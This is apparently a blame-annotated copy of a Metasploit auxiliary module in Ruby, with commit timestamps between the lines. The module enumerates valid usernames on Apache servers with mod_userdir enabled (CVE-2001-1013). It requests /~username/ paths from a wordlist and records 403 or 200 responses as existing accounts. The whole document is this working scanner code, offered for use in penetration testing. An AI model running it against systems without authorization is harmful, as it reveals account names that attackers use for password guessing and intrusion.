2011-08-15 05:56:55 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-08-15 05:56:55 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::AuthBrute
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Apache "mod_userdir" User Enumeration',
|
|
|
|
'Description' => %q{Apache with the UserDir directive enabled generates different error
|
|
|
|
codes when a username exists and there is no public_html directory and when the username
|
|
|
|
does not exist, which could allow remote attackers to determine valid usernames on the
|
|
|
|
server.},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['BID', '3335'],
|
|
|
|
['CVE', '2001-1013'],
|
2016-07-15 17:00:31 +00:00
|
|
|
['OSVDB', '637'],
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-11-25 17:16:22 +00:00
|
|
|
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
|
2013-08-30 21:28:54 +00:00
|
|
|
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
deregister_options(
|
|
|
|
'PASSWORD',
|
|
|
|
'PASS_FILE',
|
|
|
|
'USERPASS_FILE',
|
|
|
|
'STOP_ON_SUCCESS',
|
|
|
|
'BLANK_PASSWORDS',
|
|
|
|
'USER_AS_PASS'
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
@users_found = {}
|
|
|
|
|
|
|
|
each_user_pass { |user,pass|
|
|
|
|
do_login(user)
|
|
|
|
}
|
|
|
|
|
|
|
|
if(@users_found.empty?)
|
2015-11-25 17:16:22 +00:00
|
|
|
print_status("#{full_uri} - No users found.")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2015-11-25 17:16:22 +00:00
|
|
|
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
2013-08-30 21:28:54 +00:00
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:sname => (ssl ? 'https' : 'http'),
|
|
|
|
:type => 'users',
|
|
|
|
:data => {:users => @users_found.keys.join(", ")}
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def do_login(user)
|
|
|
|
|
2015-11-25 17:16:22 +00:00
|
|
|
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
|
|
|
|
uri = normalize_uri(target_uri.path)
|
2013-08-30 21:28:54 +00:00
|
|
|
payload = "#{uri}~#{user}/"
|
|
|
|
begin
|
2015-11-25 19:26:16 +00:00
|
|
|
res = send_request_cgi!(
|
2013-08-30 21:28:54 +00:00
|
|
|
{
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => payload,
|
|
|
|
'ctype' => 'text/plain'
|
|
|
|
}, 20)
|
|
|
|
|
|
|
|
return unless res
|
|
|
|
if ((res.code == 403) or (res.code == 200))
|
2015-11-25 17:16:22 +00:00
|
|
|
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
@users_found[user] = :reported
|
|
|
|
else
|
2015-11-25 17:16:22 +00:00
|
|
|
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2011-08-15 05:56:55 +00:00
|
|
|
end
|